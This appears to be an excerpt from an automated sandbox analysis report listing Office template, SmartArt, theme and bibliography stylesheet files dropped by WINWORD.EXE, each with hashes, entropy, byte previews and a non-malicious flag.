                                                                                    Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........Ul.<..<"I5...&......diagrams/layout1.xml.}.r.I..s........~Y.f.gzfv......E."w.K..J5m.e...4.0..Q... A.!...%...<...3.......O.......t~.u{...5.G......?,.........N......L......~.:....^,..r=./~7_..8............o.y......oo.3.f........f.......r.7../....qrr.v9.......,?..._O.....?9.O~]..zv.I'.W..........;..\..~....../........?~..n.....\}pt.........b,~...;>.=;>:..u.....?.......2]..]....i......9..<.p..4D..

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE52F.tmp\Content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):254
                                                                                    Entropy (8bit):3.4720677950594836
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:fxnxUXOu9+MlWlk2E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnycMlWlzGHmD0+dAH/luWvv
                                                                                    MD5:D04EC08EFE18D1611BDB9A5EC0CC00B1
                                                                                    SHA1:668FF6DFE64D5306220341FC2C1353199D122932
                                                                                    SHA-256:FA60500F951AFAF8FFDB6D1828456D60004AE1558E8E1364ADC6ECB59F5450C9
                                                                                    SHA-512:97EBCCAF64FA33238B7CFC0A6D853EFB050D877E21EE87A78E17698F0BB38382FCE7F6C4D97D550276BD6B133D3099ECAB9CFCD739F31BFE545F4930D896EEC3
                                                                                    Malicious:false
                                                                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .C.i.r.c.l.e.P.r.o.c.e.s.s...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE540.tmp\Content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):278
                                                                                    Entropy (8bit):3.5280239200222887
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:fxnxUXQAl8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyllNGHmD0wbnKYZAH/lMZqiv
                                                                                    MD5:877A8A960B2140E3A0A2752550959DB9
                                                                                    SHA1:FBEC17B332CBC42F2F16A1A08767623C7955DF48
                                                                                    SHA-256:FE07084A41CF7DB58B06D2C0D11BCACB603D6574261D1E7EBADCFF85F39AFB47
                                                                                    SHA-512:B8B660374EC6504B3B5FCC7DAC63AF30A0C9D24306C36B33B33B23186EC96AEFE958A3851FF3BC57FBA72A1334F633A19C0B8D253BB79AA5E5AFE4A247105889
                                                                                    Malicious:false
                                                                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.b...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE540.tmp\gb.xsl

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):268317
                                                                                    Entropy (8bit):5.05419861997223
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:JwprAJLR95vtfb8p4bgWPzDCvCmvQursq7vImej/yQzSS1apSiQhHDOruvoVeMUh:N9
                                                                                    MD5:51D32EE5BC7AB811041F799652D26E04
                                                                                    SHA1:412193006AA3EF19E0A57E16ACF86B830993024A
                                                                                    SHA-256:6230814BF5B2D554397580613E20681752240AB87FD354ECECF188C1EABE0E97
                                                                                    SHA-512:5FC5D889B0C8E5EF464B76F0C4C9E61BDA59B2D1205AC9417CC74D6E9F989FB73D78B4EB3044A1A1E1F2C00CE1CA1BD6D4D07EEADC4108C7B124867711C31810
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>..<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE551.tmp\Content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):274
                                                                                    Entropy (8bit):3.438490642908344
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:fxnxUXZlaWimoa2nRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyplagN2RGHmD0wbnKYZAH+Vwv
                                                                                    MD5:0F98498818DC28E82597356E2650773C
                                                                                    SHA1:1995660972A978D17BC483FCB5EE6D15E7058046
                                                                                    SHA-256:4587CA0B2A60728FF0A5B8E87D35BF6C6FDF396747E13436EC856612AC1C6288
                                                                                    SHA-512:768562F20CFE15001902CCE23D712C7439721ECA6E48DDDCF8BFF4E7F12A3BC60B99C274CBADD0128EEA1231DB19808BAA878E825497F3860C381914C21B46FF
                                                                                    Malicious:false
                                                                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.l.e.m.e.n.t. .d.e.s.i.g.n. .s.e.t...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE551.tmp\Element design set.dotx

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Word 2007+
                                                                                    Category:dropped
                                                                                    Size (bytes):34415
                                                                                    Entropy (8bit):7.352974342178997
                                                                                    Encrypted:false
                                                                                    SSDEEP:768:ev13NPo9o5NGEVIi3kvH+3SMdk7zp3tE2:ev13xoOE+R3BkR7
                                                                                    MD5:7CDFFC23FB85AD5737452762FA36AAA0
                                                                                    SHA1:CFBC97247959B3142AFD7B6858AD37B18AFB3237
                                                                                    SHA-256:68A8FBFBEE4C903E17C9421082E839144C205C559AFE61338CBDB3AF79F0D270
                                                                                    SHA-512:A0685FD251208B772436E9745DA2AA52BC26E275537688E3AB44589372D876C9ACE14B21F16EC4053C50EB4C8E11787E9B9D922E37249D2795C5B7986497033E
                                                                                    Malicious:false
                                                                                    Preview:PK.........Y5B#.W ............[Content_Types].xml ...(...................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG=.HK...........&o[B....z.7.o...&.......[.oL_7cuN..&e..ccAo...YW......8...Y>.&DVy...-&.*...Y.....4.u.., !po....9W....g..F...*+1....d,'...L.M[-~.Ey. ......[

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE552.tmp\Content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):246
                                                                                    Entropy (8bit):3.5039994158393686
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:fxnxUX4f+E3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvGHmD0+dAH/luWvv
                                                                                    MD5:16711B951E1130126E240A6E4CC2E382
                                                                                    SHA1:8095AA79AEE029FD06428244CA2A6F28408448DB
                                                                                    SHA-256:855342FE16234F72DA0C2765455B69CF412948CFBE70DE5F6D75A20ACDE29AE9
                                                                                    SHA-512:454EAA0FD669489583C317699BE1CE5D706C31058B08CF2731A7621FDEFB6609C2F648E02A7A4B2B3A3DFA8406A696D1A6FA5063DDA684BDA4450A2E9FEFB0EF
                                                                                    Malicious:false
                                                                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.b.e.d.A.r.c...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE552.tmp\TabbedArc.glox

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                    Category:dropped
                                                                                    Size (bytes):3683
                                                                                    Entropy (8bit):7.772039166640107
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:GyfQZd6ZHNCWl9aXFkZwIq/QDsRYPf8P9QtDIs5r:G6wYtNZS1k99AmPfSOtD5r
                                                                                    MD5:E8308DA3D46D0BC30857243E1B7D330D
                                                                                    SHA1:C7F8E54A63EB254C194A23137F269185E07F9D10
                                                                                    SHA-256:6534D4D7EF31B967DD0A20AFFF092F8B93D3C0EFCBF19D06833F223A65C6E7C4
                                                                                    SHA-512:88AB7263B7A8D7DDE1225AE588842E07DF3CE7A07CBD937B7E26DA7DA7CFED23F9C12730D9EF4BC1ACF26506A2A96E07875A1A40C2AD55AD1791371EE674A09B
                                                                                    Malicious:false
                                                                                    Preview:PK.........a9;lq.ri...#.......diagrams/layout1.xmlz........WKn.0.];.`..J..AP...4E..!..hi$..I......z..D.d;...m.d...f.3o.._....9'.P.I1.F.C...d.D:.........Q..Z..5$..BO...e..(.9..2..+.Tsjp.. Vt.f.<...gA.h...8...>..p4..T...9.c...'.G.;.@.;xKE.A.uX.....1Q...>...B...!T.%.* ...0.....&......(.R.u..BW.yF.Grs...)..$..p^.s.c._..F4.*. .<%.BD..E....x... ..@...v.7f.Y......N.|.qW'..m..........im.?.64w..h...UI...J....;.0..[....G..\...?:.7.0.fGK.C.o^....j4............p...w:...V....cR..i...I...J=...%. &..#..[M....YG...u...I)F.l>.j.....f..6.....2.]..$7.....Fr..o.0...l&..6U...M..........%..47.a.[..s........[..r....Q./}.-.(.\..#. ..y`...a2..*....UA.$K.nQ:e!bB.H.-Q-a.$La.%.Z!...6L...@...j.5.....b..S.\c..u...R..dXWS.R.8"....o[..V...s0W..8:...U.#5..hK....ge.Q0$>...k.<...YA.g..o5...3.....~re.....>....:..$.~........pu ._Q..|Z...r...E.X......U....f)s^.?...%......459..XtL:M.).....x..n9..h...c...PK........Ho9<"..%...........diagrams/layoutHeader1.xmlMP.N.0.>oOa.

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE573.tmp\View.thmx

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):486596
                                                                                    Entropy (8bit):7.668294441507828
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:A+JBmUx0Zo24n8z/2NSYFl2qGBuv8p6+LwwYmN59wBttsdJrmXMlP1NwQoGgeL:fNgxz/g5z2BT6+Eu0ntMcczNQG5L
                                                                                    MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                                                                    SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                                                                    SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                                                                    SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                                                                    Malicious:false
                                                                                    Preview:PK.........V'BE,.{....#P......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE573.tmp\content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):274
                                                                                    Entropy (8bit):3.535303979138867
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:Q+sxnxUX3IlVARELpmlJ0+3FbnKf68dADryMluxHFpwwl:Q+sxnynG6ymD0wbnKNAH/lMz1
                                                                                    MD5:35AFE8D8724F3E19EB08274906926A0B
                                                                                    SHA1:435B528AAF746428A01F375226C5A6A04099DF75
                                                                                    SHA-256:97B8B2E246E4DAB15E494D2FB5F8BE3E6361A76C8B406C77902CE4DFF7AC1A35
                                                                                    SHA-512:ACF4F124207974CFC46A6F4EA028A38D11B5AF40E55809E5B0F6F5DABA7F6FC994D286026FAC19A0B4E2311D5E9B16B8154F8566ED786E5EF7CDBA8128FD62AF
                                                                                    Malicious:false
                                                                                    Preview:..[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .V.i.e.w...t.h.m.x.....C.o.m.p.o.n.e.n.t.:. .P.P.T.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.P.P.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. .{.F.i.l.e.P.a.t.h.}.....

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE5C2.tmp\BracketList.glox

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft OOXML
                                                                                    Category:dropped
                                                                                    Size (bytes):4026
                                                                                    Entropy (8bit):7.809492693601857
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                                                                    MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                                                                    SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                                                                    SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                                                                    SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                                                                    Malicious:false
                                                                                    Preview:PK........YnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........bnB;?.......f......._rels/.rels...J.1.._%..f....m/.,x...&.lt.dV.y.|.."v....q..|......r..F..)..;.T5g.eP..O..Z.^-.8...<.Y....Q.."....*D.%.!9.R&#".'0(.u}).!..l....b..J..rr....P.L.w..0.-......A..w..x.7U...Fu<mT.....^s...F./ ..( .4L..`.....}...O..4.L...+H.z...m..j[].=........oY}.PK........J.L6...m....,.......diagrams/layout1.xml.X.n.8.}N.....PG.............wZ.,.R.%.K...J.H]....y.3..9...O..5."J.1.\.1....Q....z......e.5].)...$b.C)...Gx!...J3..N..H...s....9.~...#..$...W.8..I`|..0xH}......L.|..(V;..1...kF..O=...j...G.X.....T.,d>.w.Xs.......3L.r..er\o..D..^....O.F.{:.>.R'....Y-...B.P.;....X.'c...{x*.M7..><l.1.w..{].46.>.z.E.J.......G......Hd..$..7....E.

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE5C2.tmp\Content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):250
                                                                                    Entropy (8bit):3.4916022431157345
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:fxnxUXsAl8xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8A8xoGHmD0+dAH/luWvv
                                                                                    MD5:1A314B08BB9194A41E3794EF54017811
                                                                                    SHA1:D1E70DB69CA737101524C75E634BB72F969464FF
                                                                                    SHA-256:9025DD691FCAD181D5FD5952C7AA3728CD8A2CAF20DEA14930876419BED9B379
                                                                                    SHA-512:AB29C8674A85711EABAE5F9559E9048FE91A2F51EB12D5A46152A310DE59F759DF8C617DA248798A7C20F60E26FBB1B0FC8DB47C46B098BCD26CF8CE78989ACA
                                                                                    Malicious:false
                                                                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.r.a.c.k.e.t.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE5D2.tmp\Content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):256
                                                                                    Entropy (8bit):3.464918006641019
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:fxnxUXR+EqRGRnRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyB+5RmRGHmD0wbnKYZAH+Vwv
                                                                                    MD5:93149E194021B37162FD86684ED22401
                                                                                    SHA1:1B31CAEBE1BBFA529092BE834D3B4AD315A6F8F1
                                                                                    SHA-256:50BE99A154A6F632D49B04FCEE6BCA4D6B3B4B7C1377A31CE9FB45C462D697B2
                                                                                    SHA-512:410A7295D470EC85015720B2B4AC592A472ED70A04103D200FA6874BEA6A423AF24766E98E5ACAA3A1DBC32C44E8790E25D4611CD6C0DBFFFE8219D53F33ACA7
                                                                                    Malicious:false
                                                                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.q.u.a.t.i.o.n.s...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE5D2.tmp\Equations.dotx

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Microsoft Word 2007+
                                                                                    Category:dropped
                                                                                    Size (bytes):51826
                                                                                    Entropy (8bit):5.541375256745271
                                                                                    Encrypted:false
                                                                                    SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                                                                                    MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                                                                    SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                                                                    SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                                                                    SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                                                                    Malicious:false
                                                                                    Preview:PK.........R.@c}LN4...........[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG.Cd.n.j.{/......V....c..^^.E.H?H.........B.........<...Ae.l.]..{....mK......B....

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE5E3.tmp\Content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):332
                                                                                    Entropy (8bit):3.4871192480632223
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:fxnxUXsdDUaw93Ti8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyoRw9eNGHmD0wbnKYZAH/lMZqiv
                                                                                    MD5:333BA58FCE326DEA1E4A9DE67475AA95
                                                                                    SHA1:F51FAD5385DC08F7D3E11E1165A18F2E8A028C14
                                                                                    SHA-256:66142D15C7325B98B199AB6EE6F35B7409DE64EBD5C0AB50412D18CBE6894097
                                                                                    SHA-512:BFEE521A05B72515A8D4F7D13D8810846DC60F1E85C363FFEBD6CACD23AE8D2E664C563FC74700A4ED4E358F378508D25C46CB5BE1CF587E2E278EBC22BB2625
                                                                                    Malicious:false
                                                                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .m.l.a.s.e.v.e.n.t.h.e.d.i.t.i.o.n.o.f.f.i.c.e.o.n.l.i.n.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE5E3.tmp\mlaseventheditionofficeonline.xsl

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):254875
                                                                                    Entropy (8bit):5.003842588822783
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:MwprAnniNgtfbzbOWPuv7kOMBLitjAUjTQLrYHwR0TnyDkHqV3iPr1zHX5T6SSXj:a
                                                                                    MD5:377B3E355414466F3E3861BCE1844976
                                                                                    SHA1:0B639A3880ACA3FD90FA918197A669CC005E2BA4
                                                                                    SHA-256:4AC5B26C5E66E122DE80243EF621CA3E1142F643DD2AD61B75FF41CFEE3DFFAF
                                                                                    SHA-512:B050AD52A8161F96CBDC880DD1356186F381B57159F5010489B04528DB798DB955F0C530465AB3ECD5C653586508429D98336D6EB150436F1A53ABEE0697AEB9
                                                                                    Malicious:false
                                                                                    Preview:<?xml version="1.0" encoding="utf-8"?>......<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>.....<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>...</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />......<xsl:variable name="prop_EndChars">.....<xsl:call-template name="templ_prop_EndChars"/>....</xsl:variable>......<xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$parameters" />......

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE613.tmp\Content.inf

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):242
                                                                                    Entropy (8bit):3.4938093034530917
                                                                                    Encrypted:false
                                                                                    SSDEEP:6:fxnxUX44lWWoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvToGHmD0+dAH/luWvv
                                                                                    MD5:A6B2731ECC78E7CED9ED5408AB4F2931
                                                                                    SHA1:BA15D036D522978409846EA682A1D7778381266F
                                                                                    SHA-256:6A2F9E46087B1F0ED0E847AF05C4D4CC9F246989794993E8F3E15B633EFDD744
                                                                                    SHA-512:666926612E83A7B4F6259C3FFEC3185ED3F07BDC88D43796A24C3C9F980516EB231BDEA4DC4CC05C6D7714BA12AE2DCC764CD07605118698809DEF12A71F1FDD
                                                                                    Malicious:false
                                                                                    Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                    C:\Users\user\AppData\Local\Temp\TCDE613.tmp\TabList.glox

                                                                                    Download File
                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                    Category:dropped
                                                                                    Size (bytes):4888
                                                                                    Entropy (8bit):7.8636569313247335
                                                                                    Encrypted:false
                                                                                    SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                                                                    MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                                                                    SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                                                                    SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                                                                    SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                                                                    Malicious:false
